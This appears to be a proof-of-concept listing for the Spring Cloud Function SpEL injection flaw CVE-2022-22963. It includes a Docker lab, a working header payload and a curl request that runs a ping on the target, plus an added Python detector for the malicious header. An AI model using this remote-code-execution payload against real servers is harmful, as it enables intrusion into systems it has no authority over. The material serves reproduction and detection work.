PoC details: 62924d833ba8bd1b5de100e34b9a55fb2cc10d9f

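Related vulnerability
Title: Spring Framework code injection vulnerability (CVE-2022-22963)
Description: Spring Framework is an open-source Java and Java EE application framework from the Spring team in the United States. The framework helps developers build high-quality applications. Spring Framework has a code injection vulnerability. No further information on this vulnerability is currently available; watch for CNNVD or vendor announcements.
Description
Spring Cloud Function SpEL - cve-2022-22963
Introduction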
# Spring Cloud Function SpEL - cve-2022-22963
## Build
```bash
$ git clone https://github.com/twseptian/cve-2022-22963.git
$ cd cve-2022-22963
$ docker build . -t spring-spel-0day
$ docker run -p 8080:8080 --name spring-spel-0day spring-spel-0day
```

![docker run](docker_run.png)

## Payload
```bash
spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("ping -c5 172.17.0.1")
```
## PoC
Run the ping command, then capture the responses on the attacker machine:
```bash
$ curl -i -s -k -X $'POST' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\"ping -c5 172.17.0.1\")' -H $'Content-Type: application/x-www-form-urlencoded' $'http://172.17.0.2:8080/functionRouter'
```
Responses:
```bash
$ sudo tcpdump icmp -i docker0
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on docker0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
13:42:01.815194 IP 172.17.0.2 > 172.17.0.1: ICMP echo request, id 45, seq 0, length 64
13:42:01.815209 IP 172.17.0.1 > 172.17.0.2: ICMP echo reply, id 45, seq 0, length 64
13:42:02.815571 IP 172.17.0.2 > 172.17.0.1: ICMP echo request, id 45, seq 1, length 64
13:42:02.815594 IP 172.17.0.1 > 172.17.0.2: ICMP echo reply, id 45, seq 1, length 64
13:42:03.815985 IP 172.17.0.2 > 172.17.0.1: ICMP echo request, id 45, seq 2, length 64
13:42:03.816009 IP 172.17.0.1 > 172.17.0.2: ICMP echo reply, id 45, seq 2, length 64
13:42:04.816389 IP 172.17.0.2 > 172.17.0.1: ICMP echo request, id 45, seq 3, length 64
13:42:04.816426 IP 172.17.0.1 > 172.17.0.2: ICMP echo reply, id 45, seq 3, length 64
13:42:05.816751 IP 172.17.0.2 > 172.17.0.1: ICMP echo request, id 45, seq 4, length 64
13:42:05.816775 IP 172.17.0.1 > 172.17.0.2: ICMP echo reply, id 45, seq 4, length 64
```
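
Seen from the defending side, the request above is recognizable by its `spring.cloud.function.routing-expression` header. The following added example (not part of the original README) inspects raw HTTP request heads for that header and for SpEL constructs in its value; the verdict names, the marker list, and the `uppercase` function name in the samples are assumptions made for illustration.

```python
import re

# Header name as it appears in the payload on this page (matched case-insensitively).
ROUTING_HEADER = "spring.cloud.function.routing-expression"

# SpEL constructs that do more than name a function to route to.
SPEL_MARKERS = {
    "type-reference": re.compile(r"\bT\s*\("),          # T(java.lang.Runtime)
    "constructor": re.compile(r"\bnew\s+[\w.]+\s*\("),  # new some.Class(...)
    "bean-reference": re.compile(r"@\w+"),              # @beanName
    "method-call": re.compile(r"\.\s*\w+\s*\("),        # .exec(...)
}

def header_values(raw_request, wanted):
    """Return every value of header `wanted` in a raw HTTP/1.1 request head."""
    head = raw_request.replace("\r\n", "\n").split("\n\n", 1)[0]
    values = []
    for line in head.split("\n")[1:]:  # first line is the request line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == wanted:
            values.append(value.strip())
    return values

def inspect_request(raw_request):
    """Return (verdict, markers): 'clean', 'review' (header present) or 'block'."""
    # Assumption: clients in this environment do not normally send this header,
    # so its mere presence is worth a review even without SpEL constructs.
    values = header_values(raw_request, ROUTING_HEADER)
    if not values:
        return "clean", []
    markers = [name for name, rx in SPEL_MARKERS.items()
               if any(rx.search(v) for v in values)]
    return ("block" if markers else "review"), markers

# Constructed sample requests; the first carries the payload shown on this page.
SAMPLES = [
    "POST /functionRouter HTTP/1.1\r\nHost: 172.17.0.2:8080\r\n"
    "spring.cloud.function.routing-expression:"
    'T(java.lang.Runtime).getRuntime().exec("ping -c5 172.17.0.1")\r\n\r\n',
    "POST /functionRouter HTTP/1.1\r\nHost: 172.17.0.2:8080\r\n"
    "Spring.Cloud.Function.Routing-Expression: uppercase\r\n\r\nhello",
    "POST /uppercase HTTP/1.1\r\nHost: 172.17.0.2:8080\r\n"
    "Content-Type: text/plain\r\n\r\nhello",
]

if __name__ == "__main__":
    for raw in SAMPLES:
        print(raw.split("\r\n", 1)[0], "->", inspect_request(raw))
```

Only the request head is inspected, so the header name appearing in a request body does not trigger a verdict.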

## References
- [Spring-Cloud-Function-SpEL](https://github.com/Pizz33/Spring-Cloud-Function-SpEL)
- [Vulnerability reproduction: Spring Cloud Function SpEL expression injection](https://pizz33.github.io/2022/03/27/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-Spring%20Cloud%20Function%20SpEL%E8%A1%A8%E8%BE%BE%E5%BC%8F%E6%B3%A8%E5%85%A5/)
File snapshot

```
[4.0K] /data/pocs/62924d833ba8bd1b5de100e34b9a55fb2cc10d9f
├── [ 186] Dockerfile
├── [ 94K] docker_run.png
├── [4.0K] jar
│   └── [ 19M] demo-0.0.1-SNAPSHOT.jar
└── [2.1K] README.md

1 directory, 4 files
```